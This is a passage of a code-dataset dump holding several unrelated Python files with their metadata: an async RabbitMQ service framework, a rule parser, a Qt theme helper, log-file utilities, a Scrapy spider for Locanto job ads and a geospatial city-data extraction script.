set_logger(\n log_path=config.log_file,\n log_name=parsed_args.service_name,\n log_level=config.log_level,\n )\n\n new_service = ServiceFramework(\n config=config,\n callback_handler=callback_handler,\n )\n new_service.prepare_to_run(*args, **kwargs)\n new_service.service_run()\n\n\n# noinspection PyArgumentList\nclass AsyncService(object):\n \"\"\"Async service class implementation.\"\"\"\n\n def __init__(\n self,\n config: ServiceConfig,\n callback_handler: Type[BaseHandler],\n ):\n \"\"\"\n Init service instance.\n\n Args:\n config (ServiceConfig): configuration data\n callback_handler (Type[BaseHandler]r): handler to run callback\n\n \"\"\"\n self.loop = self._create_loop()\n self.config = config\n self.broker: Type[BaseBroker] = RabbitBrokerAsync\n self.callback_handler: Type[BaseHandler] = callback_handler\n\n def _create_loop(self):\n \"\"\"\n Create event loop and set up signal handlers.\n\n Returns:\n loop: asyncio event loop\n \"\"\"\n loop = asyncio.get_event_loop()\n signals = (signal.SIGHUP, signal.SIGTERM, signal.SIGINT)\n for sig in signals:\n loop.add_signal_handler(\n sig,\n self._process_sig_callback_sync,\n )\n return loop\n\n def _process_sig_callback_sync(self):\n \"\"\"Convert async callback function to sync.\"\"\"\n self.loop.create_task(self._process_sig_callback())\n\n async def _process_sig_callback(self):\n tasks = [\n task for task in asyncio.Task.all_tasks() if task is not\n asyncio.tasks.Task.current_task()\n ]\n with suppress(asyncio.exceptions.CancelledError):\n list(\n map(\n lambda task: task.cancel(),\n tasks,\n ),\n )\n pending_tasks = await asyncio.gather(\n *tasks,\n return_exceptions=True,\n )\n logger.info(\n 'Finished pending tasks: {0}'.format(\n pending_tasks,\n ),\n )\n await self.broker.stop()\n await self.callback_handler.stop_handler()\n self.loop.stop()\n logger.info('Service has benn stopped.')\n\n\nclass ServiceFramework(AsyncService, BaseService):\n \"\"\"Service-framework class implementation.\"\"\"\n\n def prepare_to_run(self, *args, **kwargs):\n \"\"\"\n Do preparation before service start.\n\n Args:\n args: extra arguments for handler constructor\n kwargs: extra key arguments for handler constructor\n\n \"\"\"\n self._take_routes()\n self._create_callback_handler(*args, **kwargs)\n self._create_broker()\n self.callback_handler.prepare_handler(\n config=self.config.handler_config,\n publisher=self.broker.publish,\n )\n logger.info(\n 'Init main_service: success. Identifier: \"{0}\"'.format(\n self.config.identifier,\n ),\n )\n\n def service_run(self):\n \"\"\"\n Start service running.\n\n If service type publisher than run handler as main process.\n \"\"\"\n if self.config.type == 'publisher':\n self.loop.create_task(self.callback_handler.call_handler())\n else:\n self.loop.create_task(self.broker.consume())\n try:\n self.loop.run_forever()\n except Exception as exception:\n logger.exception(\n 'Could not to start service. {0}'.format(\n exception,\n ),\n )\n sys.exit(1)\n finally:\n self.loop.close()\n\n def _create_broker(self):\n try:\n self.broker = self.broker(\n config=self.config.broker_config,\n callback_handler=self.callback_handler.call_handler,\n loop=self.loop,\n )\n except Exception as exception:\n logger.exception(\n 'Init main_service: broker did not created. {0}'.format(\n exception,\n ),\n )\n raise NotImplementedError('Broker did not set up.')\n logger.info('Broker has been created successfully.')\n\n def _create_callback_handler(self, *args, **kwargs):\n try:\n self.callback_handler = self.callback_handler(*args, **kwargs)\n except Exception as exception:\n logger.exception(\n 'Init main_service: handler did not created. {0}'.format(\n exception,\n ),\n )\n raise NotImplementedError('Handler did not set up.')\n logger.info('Handler has been created successfully.')\n\n def _take_routes(self):\n try:\n routes = list(\n filter(\n lambda route: route['service'] == self.config.identifier,\n load_routes(routes_file=self.config.routes_file),\n ),\n )[0]['routes']\n except Exception:\n logger.exception('Routes was not provided.')\n raise ValueError('Routes was not provided.')\n if self.config.type in {'consumer', 'all'}:\n try:\n self.config.broker_config['route_consume'] = routes['consume']\n except Exception as exception:\n logger.exception(\n 'Error getting consume route. {0}'.format(\n exception,\n ),\n )\n raise\n if self.config.type in {'publisher', 'all'}:\n try:\n self.config.handler_config['route_publish'] = routes['publish']\n except Exception as excptn:\n logger.exception(\n 'Error while filtering publish queues. {0}'.format(\n excptn,\n ),\n )\n raise\n", "repo_name": "KonsKo/RabbitMQ_microservices_remote_controller", "sub_path": "service_framework/service_async.py", "file_name": "service_async.py", "file_ext": "py", "file_size_in_byte": 10234, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.environ", "line_number": 19, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 22, "usage_type": "attribute"}, {"api_name": "logging.handlers.TimedRotatingFileHandler", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 53, "usage_type": "call"}, {"api_name": "typing.TextIO", "line_number": 62, "usage_type": "name"}, {"api_name": "service_framework.config_service.ServiceConfig", "line_number": 77, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 78, "usage_type": "call"}, {"api_name": "service_framework.config_service.ServiceConfig", "line_number": 62, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 106, "usage_type": "call"}, {"api_name": "typing.Type", "line_number": 118, "usage_type": "name"}, {"api_name": "service_framework.base_handler.BaseHandler", "line_number": 118, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 133, "usage_type": "call"}, {"api_name": "argparse.FileType", "line_number": 139, "usage_type": "call"}, {"api_name": "service_framework.config_service.ServiceConfig", "line_number": 175, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 176, "usage_type": "name"}, {"api_name": "service_framework.base_handler.BaseHandler", "line_number": 176, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 188, "usage_type": "name"}, {"api_name": "service_framework.base_broker.BaseBroker", "line_number": 188, "usage_type": "name"}, {"api_name": "service_framework.broker.rabbit_broker_async.RabbitBrokerAsync", "line_number": 188, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 189, "usage_type": "name"}, {"api_name": "service_framework.base_handler.BaseHandler", "line_number": 189, "usage_type": "name"}, {"api_name": "asyncio.get_event_loop", "line_number": 198, "usage_type": "call"}, {"api_name": "signal.SIGHUP", "line_number": 199, "usage_type": "attribute"}, {"api_name": "signal.SIGTERM", "line_number": 199, "usage_type": "attribute"}, {"api_name": "signal.SIGINT", "line_number": 199, "usage_type": "attribute"}, {"api_name": "asyncio.Task.all_tasks", "line_number": 213, "usage_type": "call"}, {"api_name": "asyncio.Task", "line_number": 213, "usage_type": "attribute"}, {"api_name": "asyncio.tasks.Task.current_task", "line_number": 214, "usage_type": "call"}, {"api_name": "asyncio.tasks", "line_number": 214, "usage_type": "attribute"}, {"api_name": "contextlib.suppress", "line_number": 216, "usage_type": "call"}, {"api_name": "asyncio.exceptions", "line_number": 216, "usage_type": "attribute"}, {"api_name": "asyncio.gather", "line_number": 223, "usage_type": "call"}, {"api_name": "service_framework.base_service.BaseService", "line_number": 238, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 281, "usage_type": "call"}]} +{"seq_id": "5242241312", "text": "from pathlib import Path\nfrom typing import List, Tuple\n\nimport attr\nimport numpy as np\n\n\n@attr.s(auto_attribs=True, slots=True, frozen=True, hash=True, cache_hash=True, eq=True)\nclass FeatureTest:\n feature_index: int\n lower_bound: float\n upper_bound: float\n\n def covers(self, dataset_instance: np.ndarray) -> bool:\n return self.lower_bound <= dataset_instance[self.feature_index] < self.upper_bound\n\n\n@attr.s(auto_attribs=True, slots=True, frozen=True, hash=True, cache_hash=True, eq=True)\nclass Rule:\n antecedent: List[FeatureTest]\n consequent: np.ndarray\n\n def covers(self, dataset_instance: np.ndarray) -> bool:\n return all((ft.covers(dataset_instance) for ft in self.antecedent))\n\n\n@attr.s(auto_attribs=True, slots=True, frozen=True, hash=True, cache_hash=True, eq=True)\nclass Individual:\n rules: List[Rule]\n\n\ndef parse_feature_test(raw: str) -> FeatureTest:\n lower_bound, tail = raw.split(' <= ')\n _, tail = tail.split('x[')\n feature_index, upper_bound = tail.split('] < ')\n\n feature_index = int(feature_index)\n\n if lower_bound == '-∞':\n lower_bound = float('-inf')\n else:\n lower_bound = float(lower_bound)\n\n if upper_bound == '∞':\n upper_bound = float('inf')\n else:\n upper_bound = float(upper_bound)\n\n return FeatureTest(feature_index=feature_index, lower_bound=lower_bound, upper_bound=upper_bound)\n\n\ndef parse_rule(raw: str, feature_count: int, class_count: int) -> Rule:\n fields = raw.split(',')\n fields = [f for f in fields if f]\n\n antecedent = (parse_feature_test(ft) for ft in fields[:feature_count])\n antecedent = list(sorted(antecedent, key=lambda ft: ft.feature_index))\n\n consequent = [bool(f) for f in fields[feature_count:]]\n\n if len(consequent) != class_count:\n raise Exception\n\n consequent = np.asarray(consequent)\n\n return Rule(antecedent=antecedent, consequent=consequent)\n\n\ndef get_feature_count_and_class_count(raw_rule: str) -> Tuple[int, int]:\n feature_count = raw_rule.count('[')\n fields = raw_rule.split(',')\n fields = [f for f in fields if f]\n class_count = len(fields) - feature_count\n\n return feature_count, class_count\n\n\ndef parse_individual(raw: str) -> Individual:\n lines = raw.split('\\n')\n\n # Remove header and footer\n rule_lines = lines[1:-1]\n\n feature_count, class_count = get_feature_count_and_class_count(raw_rule=rule_lines[0])\n rules = [parse_rule(raw=rl, feature_count=feature_count, class_count=class_count)\n for rl in rule_lines]\n\n return Individual(rules=rules)\n\n\ndef main():\n test = Path(r\"T:\\Source\\minotaur_msc_def_analysis\\minotaur_output\\run-0-dataset-CAL500-fold-0-output\\model-888.csv\")\n ind = parse_individual(test.read_text(encoding='UTF8'))\n print(ind)\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "Mirandatz/minotaur_msc_def_analysis", "sub_path": "minotaur_modeling.py", "file_name": "minotaur_modeling.py", "file_ext": "py", "file_size_in_byte": 2830, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.ndarray", "line_number": 14, "usage_type": "attribute"}, {"api_name": "attr.s", "line_number": 8, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 21, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 23, "usage_type": "attribute"}, {"api_name": "attr.s", "line_number": 18, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 29, "usage_type": "name"}, {"api_name": "attr.s", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 64, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 69, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "8361670284", "text": "from QCandyUi.CandyWindow import *\nfrom common.path import BasePath\n\n\ndef set_my_theme(widget, theme):\n \"\"\"设置主题\"\"\"\n theme_file = BasePath.THEME_FILE\n if os.path.isfile(theme_file):\n path = theme_file\n else:\n path = (os.path.split(__file__)[0] + '\\\\' + theme_file).replace('\\\\', '/')\n theme_dict = json.load(open(path))\n # theme.json的theme的优先级比setTheme中的theme的优先级高\n config_theme = theme_dict.get('theme')\n if config_theme is None or config_theme == '' or theme_dict.get(config_theme) is None:\n color_dict = theme_dict.get(theme)\n else:\n color_dict = theme_dict.get(config_theme)\n if color_dict is None:\n qss = simple_qss.getDefaultQss()\n else:\n qss = simple_qss.getQss(color_dict['fontLight'], color_dict['fontDark'], color_dict['normal'],\n color_dict['light'], color_dict['deep'], color_dict['disLight'],\n color_dict['disDark'], theme)\n widget.setStyleSheet(qss)\n", "repo_name": "ckxingchen/QuickMacro", "sub_path": "runapp/utils/theme.py", "file_name": "theme.py", "file_ext": "py", "file_size_in_byte": 1037, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "common.path.BasePath.THEME_FILE", "line_number": 7, "usage_type": "attribute"}, {"api_name": "common.path.BasePath", "line_number": 7, "usage_type": "name"}]} +{"seq_id": "2815328630", "text": "from pathlib import Path\nimport logging\n\ndef create_log_file(tmp_path,sensor, suffix):\n fp = tmp_path + \"/\" + sensor + \"_\" + suffix\n if not Path(fp).is_file():\n f = open(fp,\"w+\")\n f.write(\"0\")\n f = open(fp,\"r\")\n fd = f.read()\n logging.debug(\"File \" + sensor + \"_\" + suffix + \" created\")\n return fp\n\ndef FileContent(file):\n f = open(file,\"r\")\n fd = f.read()\n logging.debug(\"File Data (\" + file + \"): \" + fd )\n return int(fd)\n\ndef WriteData(file,value):\n f = open(file,\"w\") \n f.write(str(value))", "repo_name": "ktt-ol/floodsensor", "sub_path": "software_docker/LogFile.py", "file_name": "LogFile.py", "file_ext": "py", "file_size_in_byte": 550, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 6, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "17417498735", "text": "import datetime\n\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nimport re\n\n\n# run `scrapy crawl locanto_other2` in the Forced-Labour-Detection-IBM\\Web Scraper\\scrapy_eg\\scrapy_eg\\spiders> folder\n# NOTE: delete csv file before running the spider\nclass LocantoSpider(CrawlSpider):\n name = \"locanto\" # unique identifier for the spider\n # allowed_domains = [\"www.locanto.ie\"] # limits the crawl to this domain list\n start_urls = [\"https://www.locanto.ie/Customer-Service-Call-Centre/618/\"] # first url(s) to crawl\n # Crawling rules\n rules = (\n # use the parse() function on pages whose links match \".../ID_(number)/...\" within the \"entries\" cs class\n # e.g. https://dublin.locanto.ie/ID_4964952094/Window-blinds-installer.html\n # will match if it's in the list of entries on the page\n\n # get all jobs in this section. No locanto mobile pages or redirects.\n Rule(LinkExtractor(allow=\"locanto.ie/Customer-Service-Call-Centre/618/\", deny=[\"m.locanto\", \"mobile_redirect\"])),\n Rule(LinkExtractor(allow=\"locanto.ie/ID_\", restrict_css=\".entries\"), callback=\"parse\"),\n )\n\n def parse(self, response):\n title = response.css(\".header-text::text\").get() # extract the title\n ad_id = response.css(\".vap_ad_id::text\").get() # extract the ad id\n # format ad id\n ad_id = ad_id.replace(\"Ad ID: \", \"\")\n ad_id = ad_id.replace(\"\\n\", \"\")\n\n desc = response.xpath(\"//div[@itemprop='description']//text()\").getall() # extract the entire description\n desc = \" \".join(desc) # join the description into a single string\n desc = desc.replace(\"’\", \"\\'\") # fix the unicode apostrophe, to be safe\n desc = re.sub(\"\\s+\", \" \", desc) # remove extra whitespace\n desc = desc.replace(\"About the Position\", \"\") # remove the About the Position text\n desc = desc.replace(\" \", \" \") # remove the \" \" character\n desc = desc.encode(\"utf-8\") # convert to utf-8, just to be safe\n desc = desc.strip() # remove leading and trailing whitespace\n\n # NOTE: NOT ALL ADS HAVE A USERNAME\n # username = response.css(\".vap_sidebox_username::text\").get() # extract the username\n # username = username.replace(\"\\n\", \"\") # format username\n\n # extract the location\n city = response.xpath(\"//div[@itemprop='address']/span[@itemprop='addressLocality']/text()\").get()\n country = response.xpath(\"//div[@itemprop='address']/span[@itemprop='addressCountry']/text()\").get()\n\n # extract ad sector\n breadcrumbs = response.xpath(\"//div[@class='breadcrumb_item']/a/text()\").getall()\n length = len(breadcrumbs)\n sector = breadcrumbs[length-1] # sector is the last breadcrumb on the ad page in locanto\n sector = sector.replace(\"\\n\", \"\") # format sector\n sector = sector.rsplit(\" \", 1)[0] # remove the last word, which is just a location\n if \"County\" in sector:\n sector = sector.replace(\"County\", \"\") # remove the County from the sector\n if \"Dún\" in sector:\n sector = sector.replace(\"Dún\", \"\") # remove the Dún from the sector (e.g. if Dún Laoghaire is the location)\n sector = sector.strip() # remove leading and trailing whitespace\n\n # NOTE: PHONE NUMBER REQUIRES A LOGGED IN ACCOUNT\n # NOTE: LOCANTO AD POSTED DATE IS RELATIVE TO TODAY'S DATE, NO SPECIFIC DATE (e.g. \"Posted a week ago\")\n yield {\n \"title\": title,\n \"ad_id\": ad_id,\n \"desc\": desc,\n \"city\": city,\n \"country\": country,\n \"date\": datetime.datetime.now().strftime(\"%Y-%m-%d\"), # placeholder date is of when the scraper is run\n \"sector\": sector\n }\n", "repo_name": "johnamcgrath/Forced-Labour-Detection-IBM", "sub_path": "Web Scraper/scrapy_eg/scrapy_eg/spiders/locanto.py", "file_name": "locanto.py", "file_ext": "py", "file_size_in_byte": 3801, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "scrapy.spiders.CrawlSpider", "line_number": 10, "usage_type": "name"}, {"api_name": "scrapy.spiders.Rule", "line_number": 21, "usage_type": "call"}, {"api_name": "scrapy.linkextractors.LinkExtractor", "line_number": 21, "usage_type": "call"}, {"api_name": "scrapy.spiders.Rule", "line_number": 22, "usage_type": "call"}, {"api_name": "scrapy.linkextractors.LinkExtractor", "line_number": 22, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 69, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 69, "usage_type": "attribute"}]} +{"seq_id": "13983062688", "text": "\"\"\" city_data.py\nCity data to extracted into csv files.\n\"\"\"\nimport extract_data as etd\nimport pandas as pd\nimport geopandas as gpd\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport os\nimport time\nimport optparse\n\ndata_path = '../../datasets/'\n\ndef parseOptions():\n optParser = optparse.OptionParser()\n optParser.add_option('-c', '--plotcity',action='store',\n metavar=\"C\", type='string',dest='plot_city',default=None,\n help='City to be plotted (case sensitive; options are any city in our database (Boston, Los Angeles, Tokyo, Beijing, etc.)' )\n optParser.add_option('-w', '--worldclim',action='store_true',\n dest='worldclim',default=False,\n help='Extract WorldClim data stored at \"{}\"'.format(data_path + 'worldclim'))\n optParser.add_option('-p', '--paleoclim',action='store_true',\n dest='paleoclim',default=False,\n help='Extract PaleoClim data stored at \"{}\"'.format(data_path + 'paleoclim'))\n optParser.add_option('-l', '--landscan',action='store_true',\n dest='landscan',default=False,\n help='Extract Landscan data stored at \"{}\"'.format(data_path + 'landscan'))\n optParser.add_option('-b', '--brightness',action='store_true',\n dest='brightness',default=False,\n help='Extract Sky Brightness data stored at \"{}\"'.format(data_path + 'brightness'))\n optParser.add_option('-r', '--roads',action='store_true',\n dest='roads',default=False,\n help='Extract road density data stored at \"{}\"'.format(data_path + 'roads'))\n optParser.add_option('-m', '--human',action='store_true',\n dest='human',default=False,\n help='Extract human modification data stored at \"{}\"'.format(data_path + 'human_modification'))\n optParser.add_option('-u', '--urban_heat',action='store_true',\n dest='urban_heat',default=False,\n help='Extract urban heat data stored at \"{}\"'.format(data_path + 'roads'))\n optParser.add_option('-y', '--land_use',action='store_true',\n dest='land_use',default=False,\n help='Extract land use data stored at \"{}\"'.format(data_path + 'land_use'))\n optParser.add_option('-e', '--elevation',action='store_true',\n dest='elevation',default=False,\n help='Extract elevation data stored at \"{}\"'.format(data_path + 'elevation'))\n optParser.add_option('-g', '--geodist',action='store_true',\n dest='geodist',default=False,\n help='Output geographical distances between cities as a .csv contingency table.')\n opts, args = optParser.parse_args()\n\n return opts\n\n\nif __name__ == '__main__':\n\n opts = parseOptions()\n gdf = gpd.read_file('../../city-boundaries/ne_10m_urban_areas_landscan.shp')\n cities = pd.DataFrame({'City' : gdf['name_conve']})\n os.makedirs(data_path + '/csv_data', exist_ok=True)\n # get data for all cities.\n if not opts.plot_city is None:\n # plotting a city\n ind = np.where(cities.values == opts.plot_city)[0][0]\n poly = gdf.geometry[ind]\n if not poly.is_valid:\n poly = poly.buffer(0)\n etd.plotCity(poly, title='Plot of the city boundaries of {}'.format(opts.plot_city))\n plt.savefig('../figures/{}_bounds.png'.format(opts.plot_city))\n if opts.worldclim:\n # plot city with worldclim pixels\n tifs, file_names = etd.openTifsInDirectory(data_path + '/worldclim/')\n long_res = tifs[0].GetGeoTransform()[1]\n lat_res = tifs[0].GetGeoTransform()[5]\n # get only chunk of tif files that could be within city bounds\n y_bounds = etd.convertLatToIndex(np.array([poly.bounds[1], poly.bounds[3]]), tifs[0])\n x_bounds = etd.convertLongToIndex(np.array([poly.bounds[0], poly.bounds[2]]), tifs[0])\n df = etd.tifsToDF(tifs, chunkx=int(abs(x_bounds[1]-x_bounds[0])+1), chunky=int(abs(y_bounds[1]-y_bounds[0])+1), offsetx=int(min(x_bounds)), offsety=int(min(y_bounds)))\n df[(df < -3e30)] = None # Remove Rows that have negative numbers as population sizes.\n df = df.dropna()\n etd.plotCity(poly, pixels=df, res=[long_res,lat_res],\n title='WorldClim Pixel (5 arcmin resolution) Intersections for {}'.format(opts.plot_city))\n plt.savefig('../figures/{}_worldclim_pixels_5m.png'.format(opts.plot_city))\n \n if opts.paleoclim:\n # plot city with paleoclim pixels\n tifs, file_names = etd.openTifsInDirectory(data_path + '/paleoclim/')\n long_res = tifs[0].GetGeoTransform()[1]\n lat_res = tifs[0].GetGeoTransform()[5]\n # get only chunk of tif files that could be within city bounds\n y_bounds = etd.convertLatToIndex(np.array([poly.bounds[1], poly.bounds[3]]), tifs[0])\n x_bounds = etd.convertLongToIndex(np.array([poly.bounds[0], poly.bounds[2]]), tifs[0])\n df = etd.tifsToDF(tifs, chunkx=int(abs(x_bounds[1]-x_bounds[0])+1), chunky=int(abs(y_bounds[1]-y_bounds[0])+1), offsetx=int(min(x_bounds)), offsety=int(min(y_bounds)))\n df[(df < -3e30)] = None # Remove Rows that have negative numbers as population sizes.\n df = df.dropna()\n etd.plotCity(poly, pixels=df, res=[long_res,lat_res],\n title='PaleoClim Pixel (5 arcmin resolution) Intersections for {}'.format(opts.plot_city))\n plt.savefig('../figures/{}_paleoclim_pixels_5m.png'.format(opts.plot_city))\n \n if opts.landscan:\n # plot city with landscan pixels\n # landscan uses tifs with different dimensions, so these should graphed twice.\n tifs, file_names = etd.openTifsInDirectory(data_path + '/landscan/')\n for i,t in enumerate(tifs):\n # tifs[0] would represent the year 2000 in the directory in our case\n year = file_names[i][-8:-4]\n long_res = t.GetGeoTransform()[1]\n lat_res = t.GetGeoTransform()[5]\n # get only chunk of tif files that could be within city bounds\n y_bounds = etd.convertLatToIndex(np.array([poly.bounds[1], poly.bounds[3]]), t)\n x_bounds = etd.convertLongToIndex(np.array([poly.bounds[0], poly.bounds[2]]), t)\n df = etd.tifsToDF([t], chunkx=int(abs(x_bounds[1]-x_bounds[0])+1), chunky=int(abs(y_bounds[1]-y_bounds[0])+1), offsetx=int(min(x_bounds)), offsety=int(min(y_bounds)))\n df[(df[0] < 0)] = None # Remove Rows that have negative numbers as population sizes.\n df = df.dropna()\n etd.plotCity(poly, pixels=df, res=[long_res,lat_res],\n title='Landscan Population Pixel Intersections for {} in the year {} (resolution 30 arcsec)'.format(opts.plot_city, year))\n plt.savefig('../figures/{}_landscan_pixels_{}_30s.png'.format(opts.plot_city, year))\n plt.show()\n else:\n conts = gpd.read_file('../../continent-boundaries/ne_50m_geography_regions_polys.shp')\n conts = conts[conts['SCALERANK'] == 0]\n # Find what continent each city resides in.\n cont_list = etd.getContinents(gdf, conts)\n cities = pd.DataFrame({'City' : gdf['name_conve'], 'Region' : cont_list})\n if opts.worldclim:\n # get all cities worldclim data\n df = etd.worldclimCityData(gdf)\n df = pd.merge(cities,df,left_index=True,right_index=True)\n df.to_csv(data_path + 'csv_data/worldclim_cities.csv',index=False)\n if opts.paleoclim:\n # get all cities paleoclim data\n df = etd.paleoclimCityData(gdf)\n df = pd.merge(cities,df,left_index=True,right_index=True)\n df.to_csv(data_path + 'csv_data/paleoclim_cities.csv',index=False)\n if opts.landscan:\n # get all cities landscan data\n df = etd.landscanCityData(gdf)\n df = pd.merge(cities,df,left_index=True,right_index=True)\n df.to_csv(data_path + 'csv_data/landscan_cities.csv',index=False)\n if opts.brightness:\n # get all cities brightness data\n df = etd.brightnessData(gdf)\n df = pd.merge(cities,df,left_index=True,right_index=True)\n df.to_csv(data_path + 'csv_data/brightness_cities.csv',index=False)\n if opts.roads:\n # get all cities road density data\n df = etd.roadData(gdf)\n df = pd.merge(cities,df,left_index=True,right_index=True)\n df.to_csv(data_path + 'csv_data/roads_cities.csv',index=False)\n if opts.human:\n # get all cities human modification data\n df = etd.humanModificationData(gdf)\n df = pd.merge(cities,df,left_index=True,right_index=True)\n df.to_csv(data_path + 'csv_data/human_mod_cities.csv',index=False)\n if opts.urban_heat:\n # get all cities urban heat data\n df = etd.urbanHeatData(gdf)\n df = pd.merge(cities,df,left_index=True,right_index=True)\n df.to_csv(data_path + 'csv_data/urban_heat_cities.csv',index=False)\n if opts.land_use:\n # get all cities land usage data\n df = etd.landUseData(gdf)\n df = pd.merge(cities,df,left_index=True,right_index=True)\n df.to_csv(data_path + 'csv_data/land_use_cities.csv',index=False)\n if opts.elevation:\n # get all cities elevation data\n df = etd.elevationData(gdf)\n df = pd.merge(cities,df,left_index=True,right_index=True)\n df.to_csv(data_path + 'csv_data/elevation_cities.csv',index=False)\n if opts.geodist:\n # get geographical distances between cities\n cen = gdf.geometry.to_crs(3857).centroid # city centroids\n df = pd.DataFrame((cen.x , cen.y)).T\n city_dists = np.zeros(shape=(len(cen), len(cen))) # Distances of each city from each city\n for i, row in df.iterrows():\n city_dists[i, :] = np.sqrt(np.sum((row.values - df.values) ** 2, axis=1))\n city_dists = city_dists / 1000 # distances in km\n pd.merge(cities[['City', 'Region']], pd.DataFrame(city_dists, columns=cities['City']),\n left_index=True,right_index=True).to_csv('../cluster_data/geo_dists.csv',index=False)", "repo_name": "karechiga/world-cities-analysis", "sub_path": "code/city_data.py", "file_name": "city_data.py", "file_ext": "py", "file_size_in_byte": 10659, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "optparse.OptionParser", "line_number": 16, "usage_type": "call"}, {"api_name": "geopandas.read_file", "line_number": 58, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 59, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 64, "usage_type": "call"}, {"api_name": "extract_data.plotCity", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "extract_data.openTifsInDirectory", "line_number": 72, "usage_type": "call"}, {"api_name": "extract_data.convertLatToIndex", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 76, "usage_type": "call"}, {"api_name": "extract_data.convertLongToIndex", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 77, "usage_type": "call"}, {"api_name": "extract_data.tifsToDF", "line_number": 78, "usage_type": "call"}, {"api_name": "extract_data.plotCity", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "extract_data.openTifsInDirectory", "line_number": 87, "usage_type": "call"}, {"api_name": "extract_data.convertLatToIndex", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 91, "usage_type": "call"}, {"api_name": "extract_data.convertLongToIndex", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 92, "usage_type": "call"}, {"api_name": "extract_data.tifsToDF", "line_number": 93, "usage_type": "call"}, {"api_name": "extract_data.plotCity", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "extract_data.openTifsInDirectory", "line_number": 103, "usage_type": "call"}, {"api_name": "extract_data.convertLatToIndex", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 110, "usage_type": "call"}, {"api_name": "extract_data.convertLongToIndex", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 111, "usage_type": "call"}, {"api_name": "extract_data.tifsToDF", "line_number": 112, "usage_type": "call"}, {"api_name": "extract_data.plotCity", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "geopandas.read_file", "line_number": 120, "usage_type": "call"}, {"api_name": "extract_data.getContinents", "line_number": 123, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 124, "usage_type": "call"}, {"api_name": "extract_data.worldclimCityData", "line_number": 127, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 128, "usage_type": "call"}, {"api_name": "extract_data.paleoclimCityData", "line_number": 132, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 133, "usage_type": "call"}, {"api_name": "extract_data.landscanCityData", "line_number": 137, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 138, "usage_type": "call"}, {"api_name": "extract_data.brightnessData", "line_number": 142, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 143, "usage_type": "call"}, {"api_name": "extract_data.roadData", "line_number": 147, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 148, "usage_type": "call"}, {"api_name": "extract_data.humanModificationData", "line_number": 152, "usage_type": "call"}, {"api_name": 